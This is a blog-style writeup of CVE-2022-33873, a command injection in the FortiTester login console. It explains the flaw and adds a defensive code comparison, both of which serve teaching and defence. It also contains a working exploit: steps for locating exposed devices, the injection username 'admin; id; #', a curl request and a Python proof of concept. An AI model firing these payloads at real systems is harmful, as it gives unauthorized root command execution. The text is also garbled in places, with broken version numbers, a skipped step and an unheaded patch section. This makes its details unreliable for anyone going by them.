In this article, we’ll dive into a real-world vulnerability, CVE-2022-33873, that hit Fortinet’s FortiTester product line. This bug—a classic OS command injection—could let unauthenticated attackers run any command on the device, just by abusing the login console. Let’s break this down in plain English, look at what caused the issue, see how it can be exploited, and learn how you can stay safe.

Quick Summary

- CVE: CVE-2022-33873

- Affected versions: 7.. through 7.1.

- Type: OS Command Injection (CWE-78)

- Impact: Anyone (even unauthenticated!) could execute commands as if they had a real shell.

- Official Advisory: Fortinet PSIRT 2022-33873

What Happened?

The console login component of FortiTester (the web-based management GUI, not SSH) failed to properly validate input coming from users. When you log in, your username is concatenated into a backend shell command without being properly escaped or quoted. If you craft your input a certain way, you can smuggle actual shell commands right through.

Here’s a simplified (Python-like pseudocode) version of what might have gone wrong:

import os

def login(user_input, password):
    # BAD! user_input goes straight into a shell command line, so any
    # shell metacharacters in it (; | & $ etc.) are interpreted by the shell.
    os.system("auth_cli --user=" + user_input + " --pass=" + password)

If user_input isn’t sanitized, you could enter:

admin; whoami; #

which the app turns into:

auth_cli --user=admin; whoami; # --pass=something

Now the shell runs auth_cli --user=admin, then whoami, and ignores the rest (because # starts a comment in bash). If whoami runs and prints “root,” the attacker just ran a command as root!
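To make the contrast concrete, here is an added example (not FortiTester code and not the author's): the string-to-shell pattern from the pseudocode next to a list-based, no-shell call and an allowlist check. It uses echo as a stand-in for the assumed auth_cli helper so it runs locally and simply shows which arguments reached the program.

```python
import re
import subprocess

# Stand-in for the authentication helper in the pseudocode above (assumed
# name; not FortiTester's real binary). echo is used so the example runs
# anywhere and prints exactly the arguments the program received.
AUTH_CLI = "echo"

# Conservative allowlist for usernames; anything else is rejected.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.@-]{1,64}")


def vulnerable_login(user_input, password):
    """Same pattern as the pseudocode: one string handed to /bin/sh."""
    cmd = AUTH_CLI + " --user=" + user_input + " --pass=" + password
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout  # includes the output of any injected command


def no_shell_login(user_input, password):
    """Argument list with shell=False: ';' and '#' are plain characters."""
    argv = [AUTH_CLI, "--user=" + user_input, "--pass=" + password]
    proc = subprocess.run(argv, shell=False, capture_output=True, text=True)
    return proc.stdout


def validate_username(user_input):
    """Allowlist check, applied before any command is built."""
    return USERNAME_RE.fullmatch(user_input) is not None


def hardened_login(user_input, password):
    """Validate first, then call with an argument list. Raises on bad input."""
    if not validate_username(user_input):
        raise ValueError("username contains disallowed characters")
    # Caveat: secrets on argv are visible in the process table; a real fix
    # would hand the password over via stdin or a file descriptor instead.
    return no_shell_login(user_input, password)


if __name__ == "__main__":
    payload = "admin; id; #"  # the injection string from this article
    print("shell=True :", vulnerable_login(payload, "x").strip())
    print("shell=False:", no_shell_login(payload, "x").strip())
```

With shell=True the second line of output is the result of id; with shell=False the whole payload is echoed back as one literal argument and no second command runs.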

1. Find a Vulnerable FortiTester

Search for FortiTester instances. Shodan or Censys can help (legal usage only!). The login page will look something like:

https://<TARGET_IP>/cgi-bin/login.cgi

2. Craft Malicious Username

The goal is to inject extra shell commands through your “username”. Old-school, but it works!

Example username:

admin; id; #

If the login form just does a POST, here’s a basic cURL example:

curl -k -X POST https://victim.example/cgi-bin/login.cgi \
    -d "username=admin;id;#&password=whatever"

4. Observe the Response

If the *id* output (a line starting with uid=) appears somewhere in the response, or you see errors related to shell commands, you’re in.

Sample Exploit Code (Python)

import requests

url = "https://victim.example/cgi-bin/login.cgi"
payload = "admin; id; #"
data = {"username": payload, "password": "a"}

r = requests.post(url, data=data, verify=False)
print(r.text)  # Look for 'uid=' in the response!

- Patch: 7.1.1 or newer.

- Restrict Access: Make FortiTester only accessible from a secure management network, never from the open internet.

References

- NVD: CVE-2022-33873
- Fortinet PSIRT Advisory: 2022-33873
- CWE-78: OS Command Injection

Conclusion

CVE-2022-33873 shows how even enterprise devices can have basic input mistakes with catastrophic results. If you run any Fortinet gear, patch ASAP and review your perimeter. A single command injection bug gives attackers the keys to the kingdom.

Stay safe—keep those systems up to date and test everything with a security mindset!


*This writeup is intended for education and defense only. Always have permission before testing any system you don’t own.*

Timeline

Published on: 10/18/2022 15:15:00 UTC
Last modified on: 10/21/2022 13:00:00 UTC